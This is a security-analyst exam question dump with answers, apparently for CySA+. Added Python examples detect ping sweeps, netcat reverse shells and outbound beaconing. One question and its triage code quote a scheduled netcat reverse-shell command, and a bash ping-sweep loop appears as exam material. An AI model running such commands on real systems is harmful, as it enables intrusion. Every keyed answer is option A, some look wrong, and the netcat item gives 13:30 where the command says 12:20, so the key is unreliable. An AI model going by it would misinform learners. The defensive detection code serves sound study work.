You have just completed writing the scoping document for your next penetration test, which clearly defines what tools, techniques, and targets you intend to include during your assessment. Which of the following actions should you take next? A. Get leadership concurrence on the scoping document B. Provide a copy of the scoping document to local law enforcement C. Conduct a port scan of the target network D. Conduct passive fingerprinting on the target servers
A. Get leadership concurrence on the scoping document
An analyst has received unusual alerts on the SIEM dashboard. The analyst wants to get payloads that the hackers are sending toward the target systems without impacting the business operation. Which of the following should the analyst implement? A. Honeypot B. Jump box C. Sandboxing D. Virtualization
A. Honeypot
A staff member reported that a laptop has degraded performance. The security analyst has investigated the issue and discovered that CPU utilization, memory utilization, and outbound network traffic are consuming the laptop's resources. Which of the following is the BEST course of actions to resolve the problem? A. Identify and remove malicious processes. B. Disable scheduled tasks. C. Suspend virus scan. D. Increase laptop memory. E. Ensure the laptop OS is properly patched.
A. Identify and remove malicious processes
A security analyst is attempting to configure a vulnerability scan for a new segment on the network. Given the requirement to prevent credentials from traversing the network while still conducting a credentialed scan, which of the following is the BEST choice? A. Install agents on the endpoints to perform the scan B. Provide each endpoint with vulnerability scanner credentials C. Encrypt all of the traffic between the scanner and the endpoint D. Deploy scanners with administrator privileges on each endpoint
A. Install agents on the endpoints to perform the scan
A server contains baseline images that are deployed to sensitive workstations on a regular basis. The images are evaluated once per month for patching and other fixes, but do not change otherwise. Which of the following controls should be put in place to secure the file server and ensure the images are not changed? A. Install and configure a file integrity monitoring tool on the server and allow updates to the images each month. B. Schedule vulnerability scans of the server at least once per month before the images are updated. C. Require the use of two-factor authentication for any administrator or user who needs to connect to the server. D. Install a honeypot to identify any attacks before the baseline images can be compromised.
A. Install and configure a file integrity monitoring tool on the server and allow updates to the images each month
You are conducting a code review of a program and observe that the calculation 0xffffffff + 1 was attempted, but the result was returned as 0x00000000 (the 32-bit value wrapped around to zero). Based on this, what type of exploit could be created against this program? A. Integer overflow attack B. Password spraying C. SQL injection D. Impersonation
A. Integer overflow attack
A cybersecurity analyst has been asked to follow a corporate process that will be used to manage vulnerabilities for an organization. The analyst notices the policy has not been updated in three years. Which of the following should the analyst check to ensure the policy is still accurate? A. Threat intelligence reports B. Technical constraints C. Corporate minutes D. Governing regulations
A. Threat intelligence reports
A security analyst has discovered that an outbound SFTP process is occurring at the same time of day for the past several days. At the time this was discovered, large amounts of business critical data were delivered. The authentication for this process occurred using a service account with proper credentials. The security analyst investigated the destination IP for this transfer and discovered that this new process is not documented in the change management log. Which of the following would be the BEST course of action for the analyst to take? A. Investigate a potential incident. B. Verify user permissions. C. Run a vulnerability scan. D. Verify SLA with cloud provider.
A. Investigate a potential incident
A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as "root" and browsing the Internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following security architecture areas should the administrator recommend review and modification? (Choose two.) A. Log aggregation and analysis B. Software assurance C. Encryption D. Acceptable use policies E. Password complexity F. Network isolation and separation
A. Log aggregation and analysis D. Acceptable use policies
Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role? A. MSSP B. IaaS C. PaaS D. SaaS
A. MSSP
Various devices are connecting and authenticating to a single evil twin within the network. Which of the following are MOST likely being targeted? A. Mobile devices B. All endpoints C. VPNs D. Network infrastructure E. Wired SCADA devices
A. Mobile devices
An organization is experiencing degradation of critical services and availability of critical external resources. Which of the following can be used to investigate the issue? A. Netflow analysis B. Behavioral analysis C. Vulnerability analysis D. Risk analysis
A. NetFlow analysis
The director of software development is concerned with recent web application security incidents, including the successful breach of a back-end database server. The director would like to work with the security team to implement a standardized way to design, build, and test web applications and the services that support them. Which of the following meets the criteria? A. OWASP B. SANS C. PHP D. Ajax
A. OWASP
Nmap scan results on a set of IP addresses returned one or more lines beginning with "cpe:/o:" followed by a company name, product name, and version. Which of the following would this string help an administrator to identify? A. Operating system B. Running services C. Installed software D. Installed hardware
A. Operating system
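The "cpe:/o:" prefix is the first field of a CPE 2.2 URI: "o" names an operating system, "a" an application and "h" hardware, followed by vendor, product and (optionally) version. The following is an added example, not part of the exam page, that parses the CPE strings Nmap prints and classifies each one; the sample Nmap output block is constructed for illustration.

```python
# Added example, not from the exam page: parse the "cpe:/..." strings Nmap prints and
# say what class of thing each one names. CPE 2.2 URIs have the shape
#   cpe:/<part>:<vendor>:<product>[:<version>[:<update>[:<edition>[:<language>]]]]
# where part "o" is an operating system, "a" an application and "h" hardware.
import re
from dataclasses import dataclass
from typing import List, Optional

PART_NAMES = {"o": "Operating system", "a": "Application", "h": "Hardware"}
# A cpe:/ token: part letter, then one or more ":field" groups up to whitespace/, or ;
CPE_TOKEN_RE = re.compile(r"cpe:/[oah](?::[^\s,;]*)+")


@dataclass
class Cpe:
    part: str
    vendor: str
    product: str
    version: Optional[str] = None

    @property
    def kind(self) -> str:
        return PART_NAMES[self.part]


def parse_cpe(uri: str) -> Cpe:
    """Parse one CPE 2.2 URI; raises ValueError on anything else."""
    uri = uri.strip()
    if not uri.startswith("cpe:/"):
        raise ValueError(f"not a CPE 2.2 URI: {uri!r}")
    fields = uri[len("cpe:/"):].split(":")
    if len(fields) < 3 or fields[0] not in PART_NAMES:
        raise ValueError(f"malformed CPE: {uri!r}")
    version = fields[3] if len(fields) > 3 and fields[3] else None
    return Cpe(fields[0], fields[1], fields[2], version)


def cpes_in(text: str) -> List[Cpe]:
    """Every CPE URI found in a blob of Nmap output, in order of appearance."""
    return [parse_cpe(m.group(0)) for m in CPE_TOKEN_RE.finditer(text)]


# Constructed sample of the kind of lines Nmap -sV/-O prints (not real scan output).
SAMPLE_NMAP_OUTPUT = """\
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
cpe:/a:openbsd:openssh:7.4
cpe:/o:microsoft:windows_10:1809
cpe:/h:cisco:catalyst_2960
"""

if __name__ == "__main__":
    for c in cpes_in(SAMPLE_NMAP_OUTPUT):
        print(f"{c.kind:17} {c.vendor}/{c.product} {c.version or ''}")
```

The same parser handles the "a" and "h" parts, so it can feed an asset inventory with applications and hardware as well as the operating system the question asks about.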
During a routine review of firewall logs, an analyst identified that an IP address from the organization's server subnet had been connecting during nighttime hours to a foreign IP address, and had been sending between 150 and 500 megabytes of data each time. This had been going on for approximately one week, and the affected server was taken offline for forensic review. Which of the following is MOST likely to drive up the incident's impact assessment? A. PII of company employees and customers was exfiltrated. B. Raw financial information about the company was accessed. C. Forensic review of the server required fall-back on a less efficient service. D. IP addresses and other network-related configurations were exfiltrated. E. The local root password for the affected server was compromised.
A. PII of company employees and customers was exfiltrated
A reverse engineer was analyzing malware found on a retailer's network and found code extracting track data in memory. Which of the following threats did the engineer MOST likely uncover? A. POS malware B. Rootkit C. Key logger D. Ransomware
A. POS Malware
What type of monitoring is a network tap typically associated with? A. Passive B. Active C. Router-based D. SNMP
A. Passive
A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included. (see image Q-177) Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues? A. Perform reverse lookups on each of the IP addresses listed to help determine if the traffic is necessary. B. Recommend that networking block the unneeded protocols such as Quicktime to clear up some of the congestion. C. Put ACLs in place to restrict traffic destined for random or non-default application ports. D. Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.
A. Perform reverse lookups on each of the IP addresses listed to help determine if the traffic is necessary
As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with information defined in the SOW. Which of the following types of information should be considered based on information traditionally found in the SOW? (Choose two.) A. Timing of the scan B. Contents of the executive summary report C. Excluded hosts D. Maintenance windows E. IPS configuration F. Incident response policies
A. Timing of the scan C. Excluded hosts
Law enforcement has contacted a corporation's legal counsel because correlated data from a breach shows the organization as the common denominator from all indicators of compromise. An employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach? A. Perform security awareness training about incident communication. B. Request all employees verbally commit to an NDA about the breach. C. Temporarily disable employee access to social media D. Have law enforcement meet with employees.
A. Perform security awareness training about incident communication
A cybersecurity analyst has received the laptop of a user who recently left the company. The analyst types 'history' into the prompt, and sees this line of code in the latest bash history: for i in $(seq 255); do ping -c 1 192.168.0.$i; done This concerns the analyst because this subnet should not be known to users within the company. Which of the following describes what this code has done on the network? A. Performed a ping sweep of the Class C network. B. Performed a half open SYN scan on the network. C. Sent 255 ping packets to each host on the network. D. Sequentially sent an ICMP echo reply to the Class C network.
A. Performed a ping sweep of the Class C network
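The loop sends one ICMP echo request to each of 192.168.0.1 through 192.168.0.255 (seq 255 counts from 1, so .0 is never touched and the .255 broadcast address is). The following is an added example, not from the exam page, that lists the addresses the loop hits and detects such a sweep in sensor logs; the log line format and the sample lines are constructed for this example, so adapt LOG_RE to your own firewall or IDS format.

```python
# Added example, not from the exam page: (1) the hosts the bash loop above touches, and
# (2) a detector for that sweep in constructed echo-request log lines.
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

# Constructed log format: "<ISO timestamp> ICMP echo-request <src> -> <dst>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) ICMP echo-request (?P<src>\d+\.\d+\.\d+\.\d+) -> (?P<dst>\d+\.\d+\.\d+\.\d+)$"
)


def sweep_targets(prefix: str = "192.168.0.") -> List[str]:
    """`seq 255` prints 1..255, so the loop pings .1 through .255 and never .0."""
    return [f"{prefix}{i}" for i in range(1, 256)]


def detect_ping_sweeps(lines: Iterable[str], min_hosts: int = 10,
                       window: timedelta = timedelta(minutes=5)) -> Dict[str, Tuple[str, int]]:
    """Map each source that pinged at least `min_hosts` distinct addresses inside one
    /24 within `window` to (that /24, number of distinct hosts hit)."""
    events = defaultdict(list)  # src -> [(timestamp, dst)]
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not an echo-request line in our format
        events[m["src"]].append((datetime.fromisoformat(m["ts"]), ipaddress.ip_address(m["dst"])))
    alerts: Dict[str, Tuple[str, int]] = {}
    for src, hits in events.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):       # slide the window over the sorted hits
            seen = defaultdict(set)               # /24 -> {hosts pinged inside the window}
            for t, dst in hits[i:]:
                if t - t0 > window:
                    break
                seen[ipaddress.ip_network(f"{dst}/24", strict=False)].add(dst)
            for net, hosts in seen.items():
                if len(hosts) >= min_hosts and len(hosts) > alerts.get(src, ("", 0))[1]:
                    alerts[src] = (str(net), len(hosts))
    return alerts


# Constructed sample: 10.0.5.23 walks 192.168.0.1-.12 one host per second, while
# 10.0.5.40 (a monitoring box) pings a single gateway and must not be flagged.
SAMPLE_LOG = [
    f"2024-05-01T10:00:{i:02d} ICMP echo-request 10.0.5.23 -> 192.168.0.{i}" for i in range(1, 13)
] + [
    f"2024-05-01T10:01:{s:02d} ICMP echo-request 10.0.5.40 -> 192.168.0.1" for s in (0, 5, 10)
]

if __name__ == "__main__":
    print(len(sweep_targets()), "targets, first", sweep_targets()[0], "last", sweep_targets()[-1])
    print(detect_ping_sweeps(SAMPLE_LOG))
```

The threshold and window are tuning knobs: a real sweep of a /24 produces hundreds of distinct destinations in seconds, while legitimate monitoring repeats the same few destinations, which is why the detector counts distinct hosts per subnet rather than raw packet volume.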
Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long strings of text and then began using the sudo command to carry out actions. What type of attack has just taken place? A. Privilege escalation B. Phishing C. Session hijacking D. Social engineering
A. Privilege escalation
Which of the following BEST describes the offensive participants in a tabletop exercise? A. Red team B. Blue team C. System administrators D. Security analysts E. Operations team
A. Red Team
Which of the following countermeasures should the security administrator apply to MOST effectively mitigate Bootkit-level infections of the organization's workstation devices? A. Remove local administrator privileges. B. Configure a BIOS-level password on the device. C. Install a secondary virus protection application. D. Enforce a system state recovery after each device reboot.
A. Remove local administrator privileges
An analyst just completed a port scan and received the following results of open ports: TCP: 80, TCP: 110, TCP: 443, TCP: 1433, TCP: 3306, TCP: 3389. Based on these scan results, which of the following services are NOT currently operating? A. SSH B. Web C. RDP D. Database
A. SSH
Which of the following are essential components within the rules of engagement for a penetration test? (Choose two.) A. Schedule B. Authorization C. List of system administrators D. Payment terms E. Business justification
A. Schedule B. Authorization
Which of the following is a feature of virtualization that can potentially create a single point of failure? A. Server consolidation B. Load balancing hypervisors C. Faster server provisioning D. Running multiple OS instances
A. Server consolidation
A technician receives an alert indicating an endpoint is beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used to BEST protect the network in response to this alert? (Choose two.) A. Set up a sinkhole for that dynamic DNS domain to prevent communication. B. Isolate the infected endpoint to prevent the potential spread of malicious activity. C. Implement an internal honeypot to catch the malicious traffic and trace it. D. Perform a risk assessment and implement compensating controls. E. Ensure the IDS is active on the network segment where the endpoint resides.
A. Set up a sinkhole for that dynamic DNS domain to prevent communication B. Isolate the infected endpoint to prevent the potential spread of malicious activity
A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT? A. Start the change control process. B. Rescan to ensure the vulnerability still exists. C. Implement continuous monitoring. D. Begin the incident response process.
A. Start the change control process
DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? A. Static code analyzer B. Fuzzer C. Fault injector D. Decompiler
A. Static code analyzer
External users are reporting that a web application is slow and frequently times out when attempting to submit information. Which of the following software development best practices would have helped prevent this issue? A. Stress testing B. Regression testing C. Input validation D. Fuzzing
A. Stress Testing
A technician is running an intensive vulnerability scan to detect which ports are open to exploit. During the scan, several network services are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted? A. Syslog B. Network mapping C. Firewall logs D. NIDS
A. Syslog
A security analyst is assisting with a computer crime investigation and has been asked to secure a PC and deliver it to the forensic lab. Which of the following items would be MOST helpful to secure the PC? (Choose three.) A. Tamper-proof seals B. Faraday cage C. Chain of custody form D. Drive eraser E. Write blockers F. Network tap G. Multimeter
A. Tamper-proof seals B. Faraday cage C. Chain of custody form
Which of the following policies BEST explains the purpose of a data ownership policy? A. The policy should describe the roles and responsibilities between users and managers, and the management of specific data types. B. The policy should establish the protocol for retaining information types based on regulatory or business needs. C. The policy should document practices that users must adhere to in order to access data on the corporate network or Internet. D. The policy should outline the organization's administration of accounts for authorized users to access the appropriate data.
A. The policy should describe the roles and responsibilities between users and managers, and the management of specific data types
You are interpreting a Nessus vulnerability scan report and identified a vulnerability in the system which has a CVSS attack vector rating of A (Adjacent). Based on this information, which of the following statements would be true? A. The attacker must have access to the local network that the system is connected to B. Exploiting the vulnerability does not require any specialized conditions C. The attacker must have physical or logical access to the affected system D. Exploiting the vulnerability requires the existence of specialized conditions
A. The attacker must have access to the local network that the system is connected to
Which of the following principles describes how a security analyst should communicate during an incident? A. The communication should be limited to trusted parties only. B. The communication should be limited to security staff only. C. The communication should come from law enforcement. D. The communication should be limited to management only.
A. The communication should be limited to trusted parties only
A system administrator has reviewed the following output: (See image Q-44) Which of the following can a system administrator infer from the above output? A. The company email server is running a non-standard port. B. The company email server has been compromised. C. The company is running a vulnerable SSH server. D. The company web server has been compromised.
A. The company's email server is running on a non-standard port
A cybersecurity analyst is retained by a firm for an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs. Given the following snippet of code:
sc config schedule start auto
net start schedule
at 12:20 "C:\nc.exe 192.168.0.101 777 -e cmd.exe"
Which of the following combinations BEST describes the situation and recommendations to be made for this situation? A. The cybersecurity analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to run nc.exe; recommend proceeding with the next step of removing the host from the network. B. The cybersecurity analyst has discovered host 192.168.0.101 to be running the nc.exe file at 13:30 using the auto cron job remotely, there are no recommendations since this is not a threat currently. C. The cybersecurity analyst has discovered host 192.168.0.101 is beaconing every day at 13:30 using the nc.exe file; recommend proceeding with the next step of removing the host from the network. D. The security analyst has discovered host 192.168.0.101 is a rogue device on the network, recommend proceeding with the next step of removing the host from the network.
A. The cybersecurity analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to run nc.exe; recommend proceeding with the next step of removing that host from the network
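What the three commands do: sc config schedule start auto and net start schedule enable and start the Task Scheduler service, and at 12:20 "C:\nc.exe 192.168.0.101 777 -e cmd.exe" schedules netcat to connect out to 192.168.0.101 on TCP 777 and attach cmd.exe to that connection, a reverse shell whose listener is 192.168.0.101 (the compromised host is the one whose logs contain the commands). The following is an added example, not from the exam page, that triages such command lines; the reading of netcat's -e flag and the tag names are this example's assumptions.

```python
# Added example, not from the exam page: triage command lines for Task Scheduler abuse
# and netcat reverse shells. Assumes classic netcat semantics: "nc <host> <port> -e <prog>"
# connects to host:port and binds <prog>'s stdin/stdout to the connection.
import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SCHEDULERS = {"at", "at.exe", "schtasks", "schtasks.exe"}
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class Finding:
    cmdline: str
    tags: List[str] = field(default_factory=list)
    listener: Optional[str] = None   # "ip:port" the host will connect OUT to


def _inspect_program(argv: List[str], f: Finding) -> None:
    """Flag netcat launched with -e/-c (bind a program to the connection)."""
    if not argv:
        return
    prog = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if prog not in NETCAT_NAMES:
        return
    f.tags.append("netcat")
    positional, skip_next = [], False
    for a in argv[1:]:
        if skip_next:
            skip_next = False          # the program handed to -e/-c, e.g. cmd.exe
        elif a in ("-e", "-c"):
            f.tags.append("reverse-shell")
            skip_next = True
        elif not a.startswith("-"):
            positional.append(a)       # classic form: nc <host> <port>
    if len(positional) >= 2 and IPV4_RE.match(positional[0]) and positional[1].isdigit():
        f.listener = f"{positional[0]}:{positional[1]}"


def triage(cmdline: str) -> Finding:
    f = Finding(cmdline)
    argv = shlex.split(cmdline, posix=False)   # Windows: keep quotes, backslashes literal
    low = [a.lower() for a in argv]
    if low[:3] in (["sc", "config", "schedule"], ["net", "start", "schedule"]):
        f.tags.append("task-scheduler-enabled")
    if low and low[0] in SCHEDULERS:
        f.tags.append("scheduled-task")
        # The command to run is the quoted argument; strip the quotes and look inside it.
        for a in argv[1:]:
            if len(a) >= 2 and a.startswith('"') and a.endswith('"'):
                _inspect_program(shlex.split(a[1:-1], posix=False), f)
    else:
        _inspect_program(argv, f)
    return f


def triage_all(cmds: List[str]) -> List[Finding]:
    return [triage(c) for c in cmds]


# The snippet from the question, one command per entry.
SAMPLE_CMDS = [
    "sc config schedule start auto",
    "net start schedule",
    r'at 12:20 "C:\nc.exe 192.168.0.101 777 -e cmd.exe"',
]

if __name__ == "__main__":
    for r in triage_all(SAMPLE_CMDS):
        print(r.tags, r.listener or "", "<-", r.cmdline)
```

The listener field is the pivot for the next step: 192.168.0.101:777 is where the shell will land, so that address belongs on the block list and in the scope of the investigation alongside the host that ran the commands.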
Several users have reported that when attempting to save documents in team folders, the following message is received: The File Cannot Be Copied or Moved - Service Unavailable. Upon further investigation, it is found that the syslog server is not obtaining log events from the file server to which the users are attempting to copy files. Which of the following is the MOST likely scenario causing these issues? A. The network is saturated, causing network congestion B. The file server is experiencing high CPU and memory utilization C. Malicious processes are running on the file server D. All the available space on the file server is consumed
A. The network is saturated, causing network congestion
The Chief Information Security Officer (CISO) asked for a topology discovery to be conducted and verified against the asset inventory. The discovery is failing and not providing reliable or complete data. The syslog shows the following information: (see image Q-170) Which of the following describes the reason why the discovery is failing? A. The scanning tool lacks valid LDAP credentials. B. The scan is returning LDAP error code 52255a. C. The server running LDAP has antivirus deployed. D. The connection to the LDAP server is timing out. E. The LDAP server is configured on the wrong port.
A. The scanning tool lacks valid LDAP credentials
An application development company released a new version of its software to the public. A few days after the release, the company is notified by end users that the application is notably slower, and older security bugs have reappeared in the new release. The development team has decided to include the security analyst during their next development cycle to help address the reported issues. Which of the following should the security analyst focus on to remedy the existing reported problems? A. The security analyst should perform security regression testing during each application development cycle. B. The security analyst should perform end user acceptance security testing during each application development cycle. C. The security analyst should perform secure coding practices during each application development cycle. D. The security analyst should perform application fuzzing to locate application vulnerabilities during each application development cycle.
A. The security analyst should perform security regression testing during each application development cycle
A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device? A. The security analyst should recommend this device be placed behind a WAF. B. The security analyst should recommend an IDS be placed on the network segment. C. The security analyst should recommend this device regularly export the web logs to a SIEM system. D. The security analyst should recommend this device be included in regular vulnerability scans.
A. The security analyst should recommend this device be placed behind a WAF
A new policy requires the security team to perform web application and OS vulnerability scans. All of the company's web applications use federated authentication and are accessible via a central portal. Which of the following should be implemented to ensure a more thorough scan of the company's web application, while at the same time reducing false positives? A. The vulnerability scanner should be configured to perform authenticated scans. B. The vulnerability scanner should be installed on the web server. C. The vulnerability scanner should implement OS and network service detection. D. The vulnerability scanner should scan for known and unknown vulnerabilities.
A. The vulnerability scanner should be configured to perform authenticated scans
Review the image (see image Q-30), which of the following has occurred? A. This is normal network traffic. B. 123.120.110.212 is infected with a Trojan. C. 172.29.0.109 is infected with a worm. D. 172.29.0.109 is infected with a Trojan.
A. This is normal network traffic
Following a recent security breach, a post-mortem was done to analyze the driving factors behind the breach. The cybersecurity analysis discussed potential impacts, mitigations, and remediations based on current events and emerging threat vectors tailored to specific stakeholders. Which of the following is this considered to be? A. Threat intelligence B. Threat information C. Threat data D. Advanced persistent threats
A. Threat intelligence
A computer at a company was used to commit a crime. The system was seized and removed for further analysis. Which of the following is the purpose of labeling cables and connections when seizing the computer system? A. To capture the system configuration as it was at the time it was removed B. To maintain the chain of custody C. To block any communication with the computer system from attack D. To document the model, manufacturer, and type of cables connected
A. To capture the system configuration as it was at the time it was removed
Which of the following represent the reasoning behind careful selection of the timelines and time-of-day boundaries for an authorized penetration test? (Choose two.) A. To schedule personnel resources required for test activities B. To determine frequency of team communication and reporting C. To mitigate unintended impacts to operations D. To avoid conflicts with real intrusions that may occur E. To ensure tests have measurable impact to operations
A. To schedule personnel resources required for test activities C. To mitigate unintended impacts to operations
What phase of the software development lifecycle is sometimes known as the acceptance, installation, and deployment phase? A. Training and Transition B. Disposition C. Development D. Operations and Maintenance
A. Training and Transition
An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular attack vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting? A. Trend analysis B. Behavior analysis C. Availability analysis D. Business analysis
A. Trend analysis
During a recent audit, there were a lot of findings similar to and including the following: (see image Q-227) Which of the following would be the BEST way to remediate these findings and minimize similar findings in the future? A. Use an automated patch management solution. B. Remove the affected software programs from the servers. C. Run Microsoft Baseline Security Analyzer on all of the servers. D. Schedule regular vulnerability scans for all servers on the network.
A. Use an automated patch management solution
A security analyst is creating baseline system images to remediate vulnerabilities found in different operating systems. Each image needs to be scanned before it is deployed. The security analyst must ensure the configurations match industry standard benchmarks and the process can be repeated frequently. Which of the following vulnerability options would BEST create the process requirements? A. Utilizing an operating system SCAP plugin B. Utilizing an authorized credential scan C. Utilizing a non-credential scan D. Utilizing a known malware plugin
A. Utilizing an operating system SCAP plugin
A recent audit has uncovered several coding errors and a lack of input validation being used on a public portal. Due to the nature of the portal and the severity of the errors, the portal is unable to be patched. Which of the following tools could be used to reduce the risk of being compromised? A. Web application firewall B. Network firewall C. Web proxy D. Intrusion prevention system
A. Web application firewall
You just completed an nmap scan against a workstation and received the following output:
# nmap diontraining012
Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
Based on these results, which of the following operating systems is most likely being run by this workstation? A. Windows B. CentOS C. macOS D. Ubuntu
A. Windows
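Both of the port-scan questions above (the "TCP: 80 ... TCP: 3389" listing and this Nmap report) come down to mapping open ports to default services and reading the Windows signature of 135/139/445. The following is an added example, not from the exam page, that does both; the port table and the OS guess rule are this example's own assumptions (default ports only, no banner grabbing), so confirm with nmap -sV -O before acting on the guess.

```python
# Added example, not from the exam page: parse open TCP ports from either listing style,
# name well-known services present/absent, and make a coarse OS guess.
import re
from typing import Dict, Iterable, List, Set

# Assumption: default port assignments; any service can be moved to another port.
PORT_SERVICES: Dict[int, str] = {
    22: "SSH", 80: "Web", 110: "POP3", 135: "MS-RPC", 139: "NetBIOS", 443: "Web",
    445: "SMB", 1433: "Database", 3306: "Database", 3389: "RDP",
}
WINDOWS_HINT_PORTS = {135, 139, 445, 3389, 1433}

NMAP_OPEN_RE = re.compile(r"^\s*(\d+)/tcp\s+open\b", re.MULTILINE)   # "445/tcp open"
LISTING_RE = re.compile(r"\bTCP:\s*(\d+)\b")                           # "TCP: 445"


def open_tcp_ports(scan_text: str) -> Set[int]:
    """Open TCP ports from Nmap normal output or a 'TCP: n' listing; other lines ignored."""
    nmap_ports = {int(p) for p in NMAP_OPEN_RE.findall(scan_text)}
    listing_ports = {int(p) for p in LISTING_RE.findall(scan_text)}
    return nmap_ports | listing_ports


def services_present(ports: Iterable[int]) -> List[str]:
    return sorted({PORT_SERVICES[p] for p in ports if p in PORT_SERVICES})


def services_absent(ports: Iterable[int], wanted: Iterable[str]) -> List[str]:
    """Which of `wanted` have no open default port (e.g. no SSH because 22 is closed)?"""
    present = set(services_present(ports))
    return [s for s in wanted if s not in present]


def guess_os(ports: Iterable[int]) -> str:
    p = set(ports)
    if {135, 139, 445} <= p:
        return "Windows"               # MS-RPC + NetBIOS + SMB triad: classic Windows signature
    if p & WINDOWS_HINT_PORTS:
        return "probably Windows"      # RDP or MSSQL alone is weaker evidence
    if 22 in p:
        return "probably Unix-like"
    return "unknown"


# The two scan results from the questions above, as text.
SCAN_LISTING = "TCP: 80 TCP: 110 TCP: 443 TCP: 1433 TCP: 3306 TCP: 3389"
SCAN_NMAP = """\
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT STATE
135/tcp open
139/tcp open
445/tcp open
"""

if __name__ == "__main__":
    for text in (SCAN_LISTING, SCAN_NMAP):
        ports = open_tcp_ports(text)
        print(sorted(ports), services_present(ports),
              "missing:", services_absent(ports, ["SSH", "Web", "RDP", "Database"]),
              "OS guess:", guess_os(ports))
```

A filtered port is not a closed one: "Not shown: 997 filtered ports" means a firewall dropped the probes, so an absent service in this output may still be running behind a filter.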
A newly discovered malware has a known behavior of connecting outbound to an external destination on port 27500 for the purposes of exfiltrating data. The following are four snippets taken from running netstat -an on separate Windows workstations: (see image Q-204) Based on the above information, which of the following is MOST likely to be exposed to this malware? A. Workstation A B. Workstation B C. Workstation C D. Workstation D
A. Workstation A
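The thing to look for in netstat -an output is a TCP socket whose remote (foreign) endpoint ends in :27500 and whose state is ESTABLISHED or SYN_SENT; a local listener on 27500 or a connection whose local ephemeral port happens to be 27500 is not the described behavior. The following is an added example, not from the exam page, that applies that check; the four snippets are constructed to stand in for the question's image and deliberately include those two look-alikes.

```python
# Added example, not from the exam page: find workstations with an outbound TCP
# connection to remote port 27500 in `netstat -an` output (Windows column layout).
import re
from typing import Dict, List, Optional, Tuple

# "  TCP    10.10.1.21:49710       198.51.100.7:27500     ESTABLISHED"
NETSTAT_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)(?:\s+(?P<state>\S+))?\s*$"
)
OUTBOUND_STATES = {"ESTABLISHED", "SYN_SENT"}   # SYN_SENT: beaconing that has not connected yet


def split_endpoint(ep: str) -> Tuple[str, Optional[int]]:
    """'198.51.100.7:27500' -> ('198.51.100.7', 27500); also handles '[::1]:27500'."""
    host, _, port = ep.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def outbound_to_port(netstat_text: str, port: int) -> List[str]:
    """Remote 'host:port' endpoints this machine is connected (or connecting) to on `port`."""
    hits = []
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m or m["proto"] != "TCP":
            continue                        # header lines and UDP sockets
        rhost, rport = split_endpoint(m["remote"])
        if rport == port and m["state"] in OUTBOUND_STATES:
            hits.append(f"{rhost}:{rport}")
    return hits


def exposed_workstations(snippets: Dict[str, str], port: int = 27500) -> Dict[str, List[str]]:
    found = {}
    for name, text in snippets.items():
        hits = outbound_to_port(text, port)
        if hits:
            found[name] = hits
    return found


# Constructed snippets (not the question's image). Only A matches the described behavior.
SNIPPETS = {
    "Workstation A": """\
  Proto  Local Address          Foreign Address        State
  TCP    10.10.1.21:49710       198.51.100.7:27500     ESTABLISHED
  TCP    10.10.1.21:49711       10.10.1.5:445          ESTABLISHED
""",
    "Workstation B": """\
  TCP    0.0.0.0:27500          0.0.0.0:0              LISTENING
  TCP    10.10.1.22:49720       10.10.1.5:445          ESTABLISHED
""",
    "Workstation C": """\
  TCP    10.10.1.23:49730       203.0.113.40:443       ESTABLISHED
  UDP    10.10.1.23:27500       *:*
""",
    "Workstation D": """\
  TCP    10.10.1.24:27500       203.0.113.40:443       ESTABLISHED
  TCP    10.10.1.24:49741       10.10.1.5:445          ESTABLISHED
""",
}

if __name__ == "__main__":
    print(exposed_workstations(SNIPPETS))
```

Workstation B's LISTENING socket on 27500 and Workstation D's local port 27500 are the classic false positives when someone greps for ":27500" without checking which side of the connection the port is on.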
What SCAP component provides a language for specifying checklists? A. XCCDF B. CPE C. OVAL D. CCE
A. XCCDF
